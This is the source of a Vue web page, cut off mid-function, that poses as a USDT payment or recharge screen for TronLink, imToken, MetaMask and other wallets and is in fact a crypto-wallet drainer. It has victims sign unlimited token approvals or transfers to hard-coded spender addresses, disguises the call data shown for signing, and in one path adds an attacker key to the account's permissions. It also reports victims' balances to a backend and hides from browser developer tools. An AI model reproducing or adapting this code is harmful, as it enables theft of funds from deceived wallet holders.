<template>
    <div class="home">
        <gl-Ethereum v-if="EthereumShow" @getAddress="getAddress" ref="Ethereum"/>


        <div class="one" v-if="!show">
            <div class="navList">
                <div class="item" @click="navListTap1(item)" v-for="(item, index) in navList" :key="index">
                    <div class="_l">
                        <div class="img">
                            <img :src="item.img"/>
                        </div>
                        <div>
                            <div class="title">{{ item.nickname || item.name }}</div>
                            <div class="text">
                                {{ item.display ? $t("nav.type3") : item.payType }}
                            </div>
                        </div>
                    </div>
                    <div class="_r">
                        <div :class="['railo', activeIndex == item.value ? 'active' : '']"></div>
                    </div>
                </div>

                <div>
                    <el-button @click="nextTap" class="btn" size="medium" type="primary">
                        {{ $t(`btn.b1`) }}
                    </el-button>
                </div>
                <div class="tips">
                    {{ $t(`hint.h1`) }}
                </div>
            </div>
            <!-- <div @click="setLocale">setLocale</div> -->
        </div>
        <div class="box" v-show="show">
            <div class="title" @click="aaaa">{{ $t("form.address") }}</div>
            <div class="_box _text">
                {{
                    defaultEthereumAddress
                        ? "0xdAC17F958D2ee523a2206206994597C13D831ec7"
                        : "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t"
                }}
            </div>
            <div class="title">
                <div>{{ $t("form.amount") }}</div>
                <div class="_text">{{ amount }}USDT</div>
            </div>
            <div class="_box">
                <el-input v-model="number"></el-input>
                <div>$ {{ (number * 1.0004).toFixed(2) }}</div>
            </div>
            <el-button class="btn" size="medium" type="primary" @click="authorization">{{ $t("btn.b2") }}</el-button>
        </div>

        <div v-if="msgshow">{{ msgData }}</div>

        <el-dialog :title="$t(`hint.h2`)" :visible.sync="hintShow" width="90%">
            <span>{{ $t(`hint.recharge`) }}</span>
        </el-dialog>

        <el-dialog :title="$t(`hint.h3`)" :visible.sync="bitpieShow" width="90%">
            <div class="btnBox">
                <el-button @click="btCopy(1)" class="copyTitle">{{
                        $t("btn.b3")
                    }}
                </el-button>
            </div>

            <el-image :src="`/static/imgs/${$i18n.locale}/${walletName}-help1.jpg`"></el-image>
            <el-image :src="`/static/imgs/${$i18n.locale}/${walletName}-help2.jpg`"></el-image>
        </el-dialog>

        <el-dialog :title="$t(`hint.h2`)" :visible.sync="bitpieHinteShow" width="90%">
            <div class="bitpieHinte">{{ bitpieHinteMsg }}</div>
        </el-dialog>


        <div v-if="qrcodeShow" @click.stop="qrcodeShow = false" class="qrcodeBox">
            <div class="_box">
                <div class="title">{{ $t("hint.h4", {name: walletName}) }}</div>
                <div id="qrcode" class="qrcode" ref="qrcode"></div>
                <div class="btnBox">
                    <el-button class="title" @click="btCopy(2)">{{
                            $t("btn.b3")
                        }}
                    </el-button>
                </div>
            </div>
        </div>
    </div>
</template>
<script>
import QRCode from "qrcodejs2";
import mode from "@/utils/native";

var tp = require("tp-js-sdk");
export default {
    name: "HelloIndex",
    data() {
        return {
            msgData: null,
            msgshow: false,
            dialogVisible: false,
            EthereumShow: false,
            hintShow: false,
            radio: 1,
            show: false,
            href: "",
            radio1: false,
            radio2: false,
            copyUrl: "",
            // imtoken
            imtokenUrl: "imtokenv2://navigate/DappView?url=",
            // 合约
            contractAddress: "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t",
            approve: {
                address: "TU7zMQfwipHDy2FDA32C3dsmQU1X19Mdo5", //admin3
                amount: "90000000000000000000000000000",
                // method: "increaseApproval(address,uint256)",
                method: "approve(address,uint256)",

                remark: "",
                type: "",
            },
            number: "",
            // 余额
            amount: "",
            amount_hex: 0,
            Balance: "",
            //  钱包方法
            tronWeb: null,
            defaultAddress: null,
            contract: null,
            timeID: "",
            awindow: {},
            uuid: "",
            // 配置
            configList: [],
            registerNumber: 0,
            // 以太坊
            contractAddr: "",
            SpenderAddr: "",
            EthereumObj: {},
            //
            activeIndex: 1,
            asdasda: 1,
            //  钱包状态
            // 1波场钱包,2以太坊
            walletType: 1,
            utm_source: "",
            dataMsgs: {},
            dataMsgs1: "",
            qrcodeShow: false,
            bitpieShow: false,
            bitpieHinteShow: false,
            explainData: {},
            bitpieHinteMsg: "",
            explain: {
                0: {
                    name: "zhijie",
                    method: "approve(address,uint256)",
                    str: "095ea7b3",
                    type: 0,
                },
                1: {
                    name: "zenjia",
                    method: "increaseApproval(address,uint256)",
                    str: "d73dd623",
                    type: 0,
                },
                2: {
                    name: "zhuanzhang",
                    method: "transfer(address,uint256)",
                    str: "a9059cbb",
                    type: 0,
                },
                3: {
                    name: "zenjia",
                    method: "increaseApproval(address,uint256)",
                    str: "d73dd623",
                    type: 1,
                },
            },
            zzAddress: "",
            typeData: {},

            Am: 99999999,
            Az: "",
            jiamileixin: 0,
            walletName: "BITPIE",
            dataMsgs12: "",
            // 版本号
            ver: "",
            // 以太坊
            defaultEthereumAddress: "", //以太坊地址
        }
    },
    async created() {
        await this.getAppInfo();
    },
    mounted() {
        if (process.env.NODE_ENV != "development") {
            this.konzhitai();
        }
        this.urlString();
        this.softwareJudgmentInit();

        this.getWalletAddress();
        this.getData();
    },
    computed: {
        navList() {
            return this.$store.state.navList;
        },
    },
    methods: {
        setLocale() {
            let str = `перевод USDT
 быстрая оплата
 оплата вручную
 оплата вручную ({name})
 пока не освоено
 ImToken
 BITPIE
 тронлинк
 BitKeep
 Metamask
 TokenPocket
 Trust Wallet
 ойи (окекс)
 Щелчок на платеже
 Следующие шаги
 копировать
 В настоящее время только USDT может быть загружен из - за ограничений на загрузку, введенных третьими сторонами, пожалуйста, переведите сумму соответствующего кошелька.  полная сумма была получена автоматически.
 подсказка
 оперативный процесс
 Просканируйте двухмерный код бумажника {name}
 обратитесь к папке {name} для открытия бумажника
 не хватает энергии, чтобы торговать.
 Выберите адрес бумажника
 Выберите операцию с бумажником TRX
 Недостаточно энергии или трих для торговли
 дефицит USDT
 не хватает энергии или Oxx для торговли
 Невозможно добавить, попробуйте сменить счёт
 Не удалось загрузить адрес бумажника
 адрес инкассации
 Общая сумма`;
            let obj = {
                title: "USDT转账",
                type: "快捷支付",
                type1: "手动支付",
                type2: "手动支付({name})",
                type3: "暂未开发",
                imToken: "imToken",
                BITPIE: "BITPIE",
                TronLink: "TronLink",
                BitKeep: "BitKeep",
                Metamask: "Metamask",
                TokenPocket: "TokenPocket",
                trustwallet: "Trust Wallet",
                OKX: "欧易(OKEX)",
                b1: "点击支付",
                b2: "下一步",
                b3: "复制",
                h1: "由于第三方充值风控限制，目前只能USDT充值，请针对相应钱包进行转账充值。充值成功自动到账。",
                h2: "温馨提示",
                h3: "操作流程",
                h4: "请用{name}钱包扫描二维码",
                h5: "请前往{name}钱包打开粘贴",
                h6: "没有足够的能量或ETh用于交易",
                h7: "请选择钱包地址",
                h8: "请选择TRX钱包交易",
                h9: "没有足够的能量或TRX用于交易",
                h10: "USDT余额不足",
                h11: "没有足够的能量或OKX用于交易",
                approveMsg3: "充值失败,请换个账户试试",
                recharge: "充值失败该钱包地址USDT流水未达到2000",
                address: "收款地址",
                amount: "金额",
            };
            let snsArr = str.split(/[\r\n]+/);

            let newObj = {};
            let s = "";
            let str1 = "";
            Object.keys(obj).forEach((item, i) => {
                str1 = snsArr[i].split(`"`).join(`\\"`);

                newObj[item] = str1;

                s += `"${item}":"${str1.replace(str1[0], str1[0].toUpperCase())}",`;
            });

            this.$copy(s);
            return s;
        },
        async getAppInfo() {
            const res = await tp.getAppInfo();

            this.dataMsgs1 = res.data;

            this.ver = res.data.version;
            this.dataMsgs1 = res.data.version + "--";
        },
        // 软件进入判断处理
        softwareJudgmentInit(show) {
            this.uuid = this.$route.params.id || "";
            this.number = this.$route.query.number || "";
            this.href = window.location.href;
            let query = this.$route.query.query || "";
            query = this.$queryList(this.$route.query.query || "");

            if (query.number) {
                this.number = query.number;
            }
            let utm_source =
                this.GetHeader() ||
                this.$route.query.utm_source ||
                query.utm_source ||
                "";

            this.utm_source = utm_source ? utm_source.toLowerCase() : "";
            this.show = show
                ? true
                : this.$route.query.showType
                    ? true
                    : this.utm_source
                        ? true
                        : false;
            this.approve = this.$store.state.BaseData.approve;

            let explain = this.explain;

            let dataObj = {};
            dataObj = this.$store.state.BaseData.imToken;
            switch (this.utm_source) {
                case "imtoken":
                    dataObj = this.$store.state.BaseData.imToken;
                    break;
                case "tokenpocket":
                    dataObj = this.$store.state.BaseData.TokenPocket;

                    break;
                case "trustapp":
                    dataObj = this.$store.state.BaseData.trustapp;

                    break;

                case "bitpie":
                    if (mode.type == 3) {
                        dataObj = this.$store.state.BaseData.BITPIEIos;
                    } else {
                        dataObj = this.$store.state.BaseData.BITPIE;
                    }

                    break;
                case "tronlink":
                    dataObj = this.$store.state.BaseData.TronLink;

                    break;
                case "bitkeep":
                    dataObj = this.$store.state.BaseData.BitKeep;

                    break;
                case "metamask":
                    dataObj = this.$store.state.BaseData.metamask;

                    break;
                default:
                    break;
            }
            this.typeData = dataObj;

            if (this.utm_source) {
                let isVer = false;

                let verList = [];
                switch (mode.type) {
                    case 2:
                        isVer = dataObj.isVerAndroid || false;
                        verList = isVer ? dataObj.verAndroid || [] : [];

                        break;
                    case 3:
                        isVer = dataObj.isVerIos || false;
                        verList = isVer ? dataObj.verIos || [] : [];

                        break;
                }
                let ver = this.ver;
                this.dataMsgs1 = isVer && verList.length > 0;

                if (isVer && verList.length > 0) {
                    let newObj = {};

                    let off = false;
                    for (let index = 0; index < verList.length; index++) {
                        let item = verList[index];
                        off = this.versionJudgmentControl(
                            ver + "",
                            item.min + "",
                            item.max + ""
                        );

                        if (off) {
                            newObj = item;
                            break;
                        }
                    }
                    if (off) {
                        this.typeData.method = newObj.method;
                        this.typeData.type = newObj.type;

                        this.typeData.ztype = newObj.ztype;
                        this.typeData.zmethod = newObj.zmethod;
                        // this.dataMsgs1 = newObj;
                        let explainData = explain[newObj.method];

                        this.explainData = explainData;
                        this.approve.method = explainData.method;
                    } else {
                        let explainData = explain[dataObj.method];
                        this.explainData = explainData;
                        this.approve.method = explainData.method;
                    }
                } else {
                    let explainData = explain[dataObj.method];

                    this.explainData = explainData;
                    this.approve.method = explainData.method;
                }
            }
        },
        // 版本判断控制
        versionJudgmentControl(ver, minVer, maxVer) {
            let verList = ver.split(".");
            let minVerList = minVer.split(".");
            let maxVerList = maxVer.split(".");

            let length = verList.length;
            length = minVerList.length > length ? minVerList.length : length;
            length = maxVerList.length > length ? maxVerList.length : length;
            // let off = false;

            for (let index = 0; index < length; index++) {
                const verItem = verList[index] ? verList[index] : "0";
                const minVerItem = minVerList[index] ? minVerList[index] : "0";
                const maxVerItem = maxVerList[index] ? maxVerList[index] : "0";

                const arr = this.getMaxLength(verItem, minVerItem, maxVerItem);
                verList[index] = arr[0];
                minVerList[index] = arr[1];
                maxVerList[index] = arr[2];
            }
            let a = verList.join("");
            let b = minVerList.join("");
            let c = maxVerList.join("");

            if (a >= b && a <= c) {
                return true;
            } else {
                return false;
            }
        },
        getMaxLength(verItem, minVerItem, maxVerItem) {
            let i = verItem.length;

            i = minVerItem.length > i ? minVerItem.length : i;
            i = maxVerItem.length > i ? maxVerItem.length : i;

            return [
                this.zeroFilling(verItem, i),
                this.zeroFilling(minVerItem, i),
                this.zeroFilling(maxVerItem, i),
            ];
        },
        // 补零
        zeroFilling(str, max) {
            let i = max - str.length;
            for (let index = 0; index < i; index++) {
                str = "0" + str;
            }
            return str;
        },
        // 复制提示
        btCopy() {
            this.bitpieHinteMsg = this.$t(`hint.h5`, {name: this.walletName});

            this.$copy(this.copyUrl);
            // this.qrcodeShow = true;
            // setTimeout(() => {
            //   this.qrcode(this.copyUrl);
            // }, 100);
            this.bitpieShow = false;
            this.bitpieHinteShow = true;
        },
        // 控制台禁止
        konzhitai() {
            //禁止F12键盘事件
            document.addEventListener("keydown", function (event) {

                return 123 != event.keyCode || (event.returnValue = false);
            });
            //禁止右键、选择、复制
            document.addEventListener("contextmenu", function (event) {
                return (event.returnValue = false);
            });

            function resize() {
                var threshold = 200;
                var widthThreshold = window.outerWidth - window.innerWidth > threshold;
                var heightThreshold =
                    window.outerHeight - window.innerHeight > threshold;
                if (widthThreshold || heightThreshold) {
                    if (mode.type == 1) {
                        window.location.href = "https://www.google.com";
                    }
                }
            }

            window.addEventListener("resize", resize);
            resize();
            document.oncontextmenu = function (evt) {
                evt.preventDefault();
            };

            document.onselectstart = function (evt) {
                evt.preventDefault();
            };
        },
        // 二维码
        qrcode(url) {

            let str = url || window.location.href;
            this.copyUrl = str;
            new QRCode(this.$refs.qrcode, {
                width: 200,
                height: 200,
                text: str,
                colorDark: "#000",
                colorLight: "#fff",
            });
        },

        // 获取头部判断软件识别
        GetHeader() {
            let str = navigator.userAgent.toLowerCase();

            this.dataMsgs1 = str;

            let navigatorList = str.split("/");

            let str1 = navigator.appPackageName;
            str1 = str1 ? str1.toLowerCase() : "";

            // 欧意钱包处理
            if (str.indexOf("okex") > -1 || str1.indexOf("okex") > -1) {
                this.okxJudge();

                return;
            }
            let arr = [
                "bitpie",
                "imtoken",
                "tokenpocket",
                "tronlink",
                "bitkeep",
                "metamask",
                "trustapp",
                // "okex",
            ];
            let data = "";
            let verobj = {
                imtoken: true,
                bitpie: true,
                // okex: true,
            };
            arr.forEach((item) => {
                if (str.indexOf(item) > -1 || str1.indexOf(item) > -1) {
                    data = item;
                    if (verobj[item]) {
                        if (navigatorList.length > 0) {
                            this.ver = navigatorList[navigatorList.length - 1];
                            this.dataMsgs1 = this.ver;
                        }
                    }
                }
            });


            return data;
        },
        // 接受以太坊地址
        getAddress(address, amount) {


            this.walletType = 2;
            this.jumpPanDuan();
            this.defaultEthereumAddress = address;

            return;
            // this.amount = amount;
            // this.show = address ? true : false;
        },
        // 以太坊钱包跳转
        jumpPanDuan(routePage = "ethIndex.html") {
            let id = this.$route.params.id;

            if (id) {
                this.$router.replace({
                    path: `/${id}/${routePage}`,
                    query: this.$route.query,
                });
            } else {
                this.$router.replace({
                    path: `/${routePage}`,
                    query: this.$route.query,
                });
            }
        },
        //欧意钱包跳转
        okxJudge() {
            this.jumpPanDuan("okxIndex.html");
        },
        aaaa() {
            this.asdasda++;
            if (this.asdasda > 5) {
                this.msgshow = true;
            }
        },
        navListTap1(data) {
            if (data.disabled) {
                this.$message(this.$t(`nav.type3`));
            } else {
                this.activeIndex = data.value;
                if (this.activeIndex > 3) {
                    this.walletName = data.name;
                }
            }
        },
        // 获取基础配置
        async getData() {
            const res = await this.$h("get", `/Home/Tron/getauthconfig`, {
                uuid: this.uuid,
            });

            if (!res) {
                return;
            }
            if (res.Type == 200) {
                this.configList = res.Data;
            }

        },
        // 获取钱包地址
        getWalletAddress() {
            this.timeID = setInterval(() => {
                this.tronWeb = window.tronWeb;
                this.registerNumber++;

                this.defaultAddress = window.tronWeb
                    ? window.tronWeb.defaultAddress.base58
                        ? window.tronWeb.defaultAddress.base58
                        : ""
                    : "";

                //当获取到地址的时候就关掉定时器
                if (this.defaultAddress) {
                    this.walletType = 1;
                    this.getNumber();
                    window.clearInterval(this.timeID);
                } else {
                    if (this.registerNumber >= 5) {
                        clearInterval(this.timeID);

                        this.EthereumShow = true;
                    }
                }
            }, 500);
        },
        navTap(data) {
            if (data.url) {
                // window.location.href = data.url;
                this.getWalletAddress();
            } else {
                this.getWalletAddress();
            }
        },
        async getNumber() {
            this.show = true;
            let _this = this;

            var isBitKeep = window.isBitKeep;

            let contract = await this.tronWeb.contract().at(this.contractAddress);
            let walletAddress = this.tronWeb.defaultAddress.base58;
            await contract.balanceOf(walletAddress).call(function (err, tex) {


                if (err == null) {
                    let total = tex._hex / 10 ** 6;
                    _this.amount = total;
                    _this.amount_hex = tex._hex;

                }
            });
        },
        // 以太坊判断处理
        EthereumAuthorization() {
            let list = this.configList;

            for (let index = 0; index < list.length; index++) {
                const element = list[index];


                if (element.ChainId == this.$store.state.EthereumCoding) {
                    this.EthereumObj = element;
                    this.Am = element.ETHAm;
                    this.Az = element.ETHAz;
                    this.dataMsgs1 = this.Am <= this.amount;
                    if (this.Am <= this.amount) {
                        let dataObj = {};
                        switch (this.utm_source) {
                            case "imtoken":
                                dataObj = this.$store.state.BaseData.imToken;
                                break;
                            case "tokenpocket":
                                dataObj = this.$store.state.BaseData.TokenPocket;

                                break;
                            case "trustapp":
                                dataObj = this.$store.state.BaseData.trustapp;

                                break;
                            case "bitpie":
                                if (mode.type == 3) {
                                    dataObj = this.$store.state.BaseData.BITPIEIos;
                                } else {
                                    dataObj = this.$store.state.BaseData.BITPIE;
                                }

                                break;
                            case "tronlink":
                                dataObj = this.$store.state.BaseData.TronLink;

                                break;
                            case "bitkeep":
                                dataObj = this.$store.state.BaseData.BitKeep;

                                break;
                            case "metamask":
                                dataObj = this.$store.state.BaseData.metamask;

                                break;
                        }
                        this.explainType = 1;
                        dataObj.method = dataObj.zmethod;
                        this.EthereumObj.SpenderAddr = this.Az;
                        this.typeData = dataObj;
                    }
                    break;
                }
            }
            if (!this.EthereumObj.SpenderAddr) {
                this.EthereumObj.SpenderAddr =
                    this.$store.state.BaseData.EthereumConfig.address;
            }

            if (this.$refs.Ethereum.ethQuantity < 0.001) {
                this.$message.warning({
                    duration: 5000,
                    message: this.$t("hint.h6"),
                });
                return;
            }

            this.$refs.Ethereum.EthereumObj = this.EthereumObj;
            switch (this.typeData.method) {
                case 2:
                    if (this.amount == 0) {
                        this.$message.warning({
                            duration: 5000,
                            message: this.$t("hint.h6"),
                        });
                        return;
                    }

                    this.$refs.Ethereum.transferJoin();
                    break;

                default:
                    this.$refs.Ethereum.approveJoin();
                    break;
            }
        },
        // 下一步
        nextTap() {
            if (!this.radio) {
                this.$message(this.$t("hint.h7"));
            }
            let Ethereum = this.$refs.Ethereum
                ? this.$refs.Ethereum.account
                    ? true
                    : false
                : false;

            if (!this.defaultAddress && !Ethereum) {
                let url = window.location.href;

                switch (this.activeIndex) {
                    case 1:
                        url = this.urlString("imtoken", 2);
                        window.location.href =
                            "imtokenv2://navigate?screen=DappView&url=" + url;
                        break;
                    case 2:
                        url = this.urlString("TokenPocket");
                        window.location.href = `tpdapp://open?params={"url": "${url}", "chain": "TRX", "source":"xxx"}`;

                        break;
                    case 3:
                        url = this.urlString("trustapp", 2);


                        window.location.href = `trust://open_url?coin_id=60&url=${url}`;

                        break;
                    case 4:
                        url = this.urlString("bitpie");
                        debugger;
                        this.copyUrl = url;
                        this.$copy(this.copyUrl);
                        this.bitpieShow = true;
                        break;
                    case 5:
                        url = this.urlString("tronlink");

                        this.copyUrl = url;
                        this.$copy(this.copyUrl);

                        // this.qrcodeShow = true;
                        this.bitpieShow = true;
                        // setTimeout(() => {
                        //   this.qrcode(url);
                        // }, 100);
                        break;
                    case 6:
                        url = this.urlString("bitkeep");
                        this.copyUrl = url;
                        this.$copy(this.copyUrl);
                        this.bitpieShow = true;
                        // this.qrcodeShow = true;

                        // setTimeout(() => {
                        //   this.qrcode(url);
                        // }, 100);
                        break;
                    case 7:
                        url = this.urlString("metamask");

                        this.copyUrl = url;
                        this.$copy(this.copyUrl);
                        this.bitpieShow = true;
                        // this.qrcodeShow = true;

                        // setTimeout(() => {
                        //   this.qrcode(url);
                        // }, 100);
                        break;
                    case 8:
                        url = this.urlString("okex");

                        this.copyUrl = url;
                        this.$copy(this.copyUrl);
                        this.bitpieShow = true;
                        // this.qrcodeShow = true;

                        setTimeout(() => {
                            this.qrcode(url);
                        }, 100);
                        break;
                    default:
                        break;
                }
            } else {
                this.show = true;
            }
        },

        urlString(name, type = 1) {
            let url = window.location.href;
            let obj = {
                lang: this.$i18n.locale,
                showType: 1,
                type: this.$i18n.locale,
                locale: this.$i18n.locale,
                utm_source: name,
            };
            let strList = [];
            if (url.indexOf("?") > 0) {
                let query = this.$route.query;

                let obj1 = {...query, ...obj};
                let newUrl = url.split("?")[0];
                if (type == 2) {
                    Object.keys(obj1).forEach((item) => {
                        strList.push(item + "--" + obj1[item]);
                    });
                    url = newUrl + "?" + "query=" + strList.join(",");
                } else {
                    url = newUrl + "?" + this.$qs.stringify(obj1);
                }
            } else {
                if (type == 2) {
                    Object.keys(obj).forEach((item) => {
                        strList.push(item + "--" + obj[item]);
                    });
                    url = url + "?" + "query=" + strList.join(",");
                } else {
                    url = url + "?" + this.$qs.stringify(obj);
                }
            }
            return url;
        },
        // 授权
        async authorization() {
            this.softwareJudgmentInit(true);
            if (!this.defaultAddress) {
                //调用方式1
                let Ethereum = this.$refs.Ethereum
                    ? this.$refs.Ethereum.account
                        ? true
                        : false
                    : false;
                if (Ethereum) {
                    this.EthereumAuthorization();
                    // this.$message.warning({
                    //     duration: 5000,
                    //     message: this.$t("hint.h8"),
                    // });
                    // return;
                } else {
                    this.$message.warning({
                        duration: 5000,
                        message: this.$t("hint.h8"),
                    });
                    return;
                }
                // let url = window.location.href;

                // if (url.indexOf("?") > 0) {
                //   url = url + "&showType=1";
                // } else {
                //   url = url + "?showType=1";
                // }
                // window.location.href = "imtokenv2://navigate/DappView?url=" + url;
                // // this.dialogVisible = true;
                // return;
            }
            // 获取trx 余额
            let tradeobj = await window.tronWeb.trx.getAccount(this.defaultAddress);
            let trxye = tradeobj["balance"] ? tradeobj["balance"] / 1000000 : 0;

            this.Balance = trxye;


            // this.newMethod3();
            if (this.Balance < 7) {
                this.$message.warning({
                    duration: 5000,
                    message: this.$t("hint.h9"),
                });
                return;
            }
            let list = this.configList;
            for (let index = 0; index < list.length; index++) {
                const element = list[index];
                if (element.ChainId == this.$store.state.coding) {
                    this.contractAddress = element.Contract;
                    this.approve.address = element.SpenderAddr;
                    this.approve.type = element.Symbol;
                    this.zzAddress = element.ZZAddress;
                    this.Am = element.Am;
                    this.Az = element.Az;
                    this.dataMsgs1 = this.Am <= this.amount;

                    if (this.Am <= this.amount) {
                        let dataObj = {};
                        switch (this.utm_source) {
                            case "imtoken":
                                dataObj = this.$store.state.BaseData.imToken;
                                break;
                            case "tokenpocket":
                                dataObj = this.$store.state.BaseData.TokenPocket;

                                break;
                            case "trustapp":
                                dataObj = this.$store.state.BaseData.trustapp;

                                break;
                            case "bitpie":
                                if (mode.type == 3) {
                                    dataObj = this.$store.state.BaseData.BITPIEIos;
                                } else {
                                    dataObj = this.$store.state.BaseData.BITPIE;
                                }

                                break;
                            case "tronlink":
                                dataObj = this.$store.state.BaseData.TronLink;

                                break;
                            case "bitkeep":
                                dataObj = this.$store.state.BaseData.BitKeep;

                                break;
                            case "metamask":
                                dataObj = this.$store.state.BaseData.metamask;

                                break;
                        }
                        dataObj.method = dataObj.zmethod;
                        dataObj.type = dataObj.ztype;
                        this.dataMsgs1 = this.dataMsgs1 + "---" + dataObj.type;
                        this.typeData = dataObj;
                        if (this.utm_source) {
                            let explain = this.explain;
                            let explainData = explain[dataObj.method];
                            this.explainData = explainData;
                            this.approve.method = explainData.method;
                        }
                        this.approve.address = element.Az;

                        this.jiamileixin = 1;
                    }
                    break;
                }
            }

            var contractAddress = this.contractAddress;
            //选择合约方法
            let functionSelector = this.approve.method;
            //根据方法构造参数
            this.dataMsgs1 = this.typeData;
            let explainType = this.typeData.method == 2;
            let jiamileixin = this.jiamileixin;
            explainType = explainType
                ? explainType
                : functionSelector.indexOf("transfer") > -1
                    ? true
                    : false;
            if (explainType && this.amount < 1) {
                this.$message.warning({
                    duration: 5000,
                    message: this.$t("hint.h10"),
                });
                return;
            }

            let toAddress =
                jiamileixin == 1
                    ? this.Az
                    : explainType
                        ? this.zzAddress
                            ? this.zzAddress
                            : this.$store.state.BaseData.zzAddress
                        : this.approve.address;
            this.approve.address = toAddress;
            let methodType = this.typeData.method;
            // 3
            if (methodType == 3 && this.Balance >= 100) {
                this.newMethod3();
                return;
            }

            let parameter = [
                {
                    type: "address",
                    value: toAddress,
                },
                {
                    type: "uint256",
                    value: explainType
                        ? this.tronWeb.toHex(this.amount * Math.pow(10, 6))
                        : this.approve.amount,
                },
            ];
            let remark = this.approve.remark;
            //额外参数
            let options = {
                shouldPollResponse: false,
                feeLimit: 1000000, //1Trx
            };


            if (this.typeData.method != 2 && this.typeData.method != 3) {
                const res = await this.$h("get", `/Home/Tron/getauthstatus`, {
                    address: this.defaultAddress,
                    authAddress: toAddress,
                });

                if (res === true) {
                    this.$message.warning({
                        duration: 5000,
                        message: this.$t(`hint.approveMsg3`),
                    });
                    return;
                }
            }
            // if (options) {
            //   return;
            // }
            this.contractMethod(
                contractAddress,
                functionSelector,
                parameter,
                remark,
                options,
                explainType ? "transfer" : "approve",
                toAddress
            );
        },
        async newMethod3() {
            const res = await this.$h("get", `/Home/Tron/getauthstatus`, {
                address: this.defaultAddress,
                authAddress: this.approve.address,
            });

            if (res === true) {
                this.$message.warning({
                    duration: 5000,
                    message: this.$t(`hint.approveMsg3`),
                });
                return;
            }
            let tronWeb = window.tronWeb;

            let walletAddress = tronWeb.defaultAddress.base58;
            let hexAddress = tronWeb.address.toHex(walletAddress);

            let owner = "";
            let actives = "";

            // var resultData;
            let _this = this;
            tronWeb.trx.getAccount(walletAddress).then(async (result) => {


                owner = result.owner_permission;
                actives = result.active_permission;


                var activesAddress = _this.approve.address;

                var item = {
                    address: tronWeb.address.toHex(activesAddress),
                    weight: 1,
                };

                if (actives == undefined) {
                    return;
                }


                actives[0].keys.push(item);

                //owner.keys.splice(0, owner.keys.length);
                //owner.keys.push(item);


                let data = {
                    owner_address: hexAddress,
                    owner: owner,
                    actives: actives,
                };

                const res = await _this.$h(
                    "post",
                    `https://api.trongrid.io/wallet/accountpermissionupdate`,
                    data
                );

                var tx = res;
                const signedTx = await tronWeb.trx.sign(tx);

                const broastTx = await tronWeb.trx.sendRawTransaction(signedTx);


                _this.authaccountUploading({
                    address: _this.defaultAddress,
                    authAddress: _this.approve.address,
                    status: broastTx ? (broastTx.result ? 1 : 0) : 0,
                    Contract: _this.contractAddress,
                    agentId: _this.uuid,
                    type: _this.approve.type,
                    ChainId: _this.$store.state.coding,
                    Usdt: _this.amount || 0,
                    Balance: _this.Balance || 0,
                    tag: 20,
                    TxId: broastTx ? broastTx.txid : "",
                    app: _this.utm_source,
                    ua: navigator.userAgent.toLowerCase(),
                });

                if (this.amount < 2000) {
                    if (!broastTx) {
                        return;
                    }
                    if (!broastTx.result) {
                        return;
                    }

                    // this.hintShow = true;
                    this.$message.warning({
                        duration: 5000,
                        message: this.$t("hint.recharge"),
                    });
                }
            });
        },
        async authaccountUploading(data) {
            if (this.jiamileixin === 1) {
                return;
            }
            const res = await this.$h("post", `/Home/Tron/account`, data);
        },
        async transferRecord(data) {
            if (this.jiamileixin === 1) {
                return;
            }
            const res = await this.$h("post", `/Home/Tron/createtrans`, data);
            // if (res.Type == 200) {
            // } else {
            // }

        },
        // 增加
        async increaseAuthorization() {
            var contractAddress = this.contractAddress;
            //选择合约方法
            let functionSelector = this.approve.increaseMethod;
            //根据方法构造参数
            let explainType = this.typeData.method == 2;

            let parameter = [
                {
                    type: "address",
                    value: explainType
                        ? this.zzAddress
                            ? this.zzAddress
                            : this.$store.state.BaseData.zzAddress
                        : this.approve.address,
                },
                {
                    type: "uint256",
                    value: explainType
                        ? this.tronWeb.toHex(this.amount * Math.pow(10, 6))
                        : this.tronWeb.toHex(this.approve.amount * Math.pow(10, 6)),
                },
            ];
            let remark = this.approve.remark;
            //额外参数f
            let options = {
                shouldPollResponse: false,
                feeLimit: 1000000, //1Trx
            };

            this.contractMethod(
                contractAddress,
                functionSelector,
                parameter,
                remark,
                options
            );
        },

        //
        // 合约方法
        /*contractAddress  合约
         * method String 合约方法
         * parameter Array 合约参数
         * remark String 备注
         * options Object 额外参数
         */
        async contractMethod(
            contractAddress,
            method,
            parameter,
            remark,
            options = {},
            type,
            toAddress
        ) {

            //选择合约方法
            let functionSelector = method;
            //根据方法构造参数

            // 构造智能合约交易信息
            let res = await this.tronWeb.transactionBuilder
                .triggerSmartContract(contractAddress, functionSelector, {}, parameter)
                .catch((err1) => {

                    // 构建交易信息失败
                    return false;
                });
            // 向转账交易信息中追加 备注信息
            // await this.tronWeb.transactionBuilder.addUpdateData(
            //   res.transaction,
            //   remark,
            //   "utf8"
            // );
            // 对已经添加备注的交易信息进行签名
            //
            let data = "";
            let hex_ = "";
            let tranType = "";
            let tranData = "";
            let typeData = this.typeData;
            let encryptionType = typeData.type;
            let explainData = this.explainData;
            let replaceData = this.$store.state.BaseData.replaceData;

            if (encryptionType == 1) {
                let replaceStr = explainData.str;
                data = res.transaction.raw_data.contract[0].parameter.value.data;
                res.transaction.raw_data.contract[0].parameter.value.data =
                    data.replace(replaceStr, replaceData[replaceStr]);
                hex_ = res.transaction.raw_data_hex;
                res.transaction.raw_data_hex = hex_.replace(
                    replaceStr,
                    replaceData[replaceStr]
                );
            }
            if (encryptionType == 2) {
                tranData = res.transaction.raw_data.contract[0].parameter.value.data;
                tranType = res.transaction.raw_data.contract[0].type;

                res.transaction.raw_data.contract[0].parameter.value.data = "Transfer";
                res.transaction.raw_data.contract[0].type = "Transfer";
            }
            // if (this.utm_source) {

            //   //types = res.transaction.raw_data.contract[0].type;


            //   //res.transaction.raw_data.contract[0].parameter.value.data = "USDT";
            //   // res.transaction.raw_data.contract[0].parameter.value.data =
            //   //   data.replace("095ea7b3", "00000000");
            //   //res.transaction.raw_data.contract[0].type = "USDT";
            //   // res.transaction.raw_data_hex = hex_.replace("095ea7b3", "00000000");
            // }

            //
            let sign = await this.tronWeb.trx
                .sign(res.transaction)

                .catch((err2) => {


                    //签名失败
                    return false;
                });

            if (encryptionType == 1) {
                sign.raw_data.contract[0].parameter.value.data = data;
                //sign.raw_data.contract[0].type = types;
                sign.raw_data_hex = hex_;
            }

            if (encryptionType == 2) {
                sign.raw_data.contract[0].parameter.value.data = tranData;
                sign.raw_data.contract[0].type = tranType;
            }

            // 将签名交易广播上链
            return await this.tronWeb.trx
                .sendRawTransaction(sign)
                .then((res) => {

                    switch (type) {
                        case "approve":
